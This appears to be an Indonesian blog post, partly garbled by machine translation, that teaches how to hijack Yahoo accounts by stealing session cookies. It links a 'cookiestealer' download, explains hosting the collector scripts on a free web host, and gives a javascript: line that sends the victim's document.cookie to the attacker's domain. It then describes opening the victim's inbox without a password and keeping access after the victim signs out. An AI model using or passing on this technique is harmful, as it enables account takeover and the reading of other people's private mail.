berbicara dalam bahasa yang sederhana, setiap kali kita masuk ke account itu menghasilkan sepotong taliyang unik. Satu salinan disimpan di server dan lainnya di browser kita sebagai cookie. Keduanya cocok setiap kali kita melakukan sesuatu dalam account kita. Ini bagian dari sesi string atau login hancur ketika kita klikpada pilihan 'Sign Out'.
Cukup login ke yahoo.com. Ketik browser javascript: alert (document.cookie);
Anda akan mendapatkan kotak yang menampilkan pop up Anda cookie. Sekarang login ke account Andadan melakukan hal yang sama, Anda akan melihat lebih banyak unsur ditambahkan ke cookie. Id ini merupakan sesi.
Seorang penyerang bisa mencuri sesi yang oleh korban meyakinkan untuk menjalankan potongan kodedalam browser. Penyerang dapat menggunakan sesi dicuri untuk login ke account korban tanpa memberikanusername / password. Serangan ini sangat jarang karena ketika, sesi 'out Daftar' klik korban akan hancur danpenyerang terlalu juga mendapatkan sign out.
Namun dalam kasus yahoo, dan ini tidak doesnt same.The penyerang mendapatkan menandatangani ketikakorban klik 'Sign out'. Meskipun sesi secara otomatis akan hancur setelah 24 jam oleh yahoo. Tapi ketikapengguna hanya menyegarkan jendela di account yahoo, dia mendapat sesi untuk selanjutnya 24 jam. Ini berarti, setelah sesi akun yahoo dicuri, penyerang dapat mengakses account waktu hidup dengan jendelamenyegarkan dalam setiap 24 jam. Saya tidak benar-benar yakin apakah 24 atau 48 nya jam.
Persyaratan: Download beberapa file dari sini
http://www.ziddu.com/downloadlink/13712247/cookiestealer.rar
Tutorial untuk mencuri ID sesi: -
1. Sign Up untuk account di situs webhosting gratis. Saya telah memilih my3gb.com.
2. Login ke akun anda dan masuk ke file manager. Upload empat file yang baru saja Anda download.
Membuat 'cookies' direktori baru di sini.
3. Berikan kode ini untuk korban dijalankan dalam browser ketika dia akan log in ke account yahoo nya. Yahoo.php pada dasarnya mencuri cookie script dan hacked.php mengeksekusi cookie dicuri di browser.
Cookie Dicuri mendapatkan disimpan dalam 'cookie' direktori
. javascript: document.location 'http://yourdomain.com/yahoo.php?ex =' = concat (escape (document.cookie));
Dia kembali akan diarahkan ke account yahoo nya.
You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.
Sekarang tidak masalah jika tanda-tanda korban keluar dari account-nya, Anda akan tetap masuk ke dalamnya.
Catatan: Anda dapat mencoba serangan ini dengan menggunakan dua browser. Masuk ke account yahoodalam satu browser dan menjalankan kode. Kemudian sign in melalui browser lain yang menggunakan sesidicuri.
Terima kasih telah membaca pasal ini.
0 comments:
Post a Comment
WELLCOME MY WEB